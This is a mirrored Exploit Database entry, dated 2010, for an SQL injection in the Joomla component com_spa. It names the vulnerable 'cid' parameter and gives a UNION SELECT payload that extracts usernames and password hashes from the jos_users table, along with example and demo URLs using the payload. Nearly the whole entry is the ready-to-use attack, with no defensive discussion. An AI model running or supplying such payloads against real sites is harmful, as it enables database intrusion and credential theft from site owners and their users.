Joomla! Component com_spa – SQL Injection (2)

• Exploit Database
• 9 阅读

• 作者： Palyo34 & KroNicKq
  日期： 2010-07-17
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14394/

• ===================================================
  Joomla Component (com_spa) SQL Injection Vulnerability
  ===================================================
  
  Author : Palyo34 & KroNicKq 
  
  Homepage : http://www.1923turk.com
  
  ===================================================
  
  
  [+] Vulnerable File :
  
  
  http://www.site.com/index.php?option=com_spa&view=spa_product&cid=[SQL]
  
  
  [+] ExploiT :
  
  -1+union+select concat(username,0x3a,password)+from+jos_users
  
  
  [+] Example :
  
  http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-1+union+select concat(username,0x3a,password)+from+jos_users
  
  
  [+] Demo :
  
  http://www.site.com/index.php?option=com_spa&view=spa_product&cid=-20+union+select+concat(username,0x3a,password)+from+jos_users
  
  
  ===================================================
  I Lowe You Joomla :))
  ===================================================
  
  Greetz : 1923Turk All Users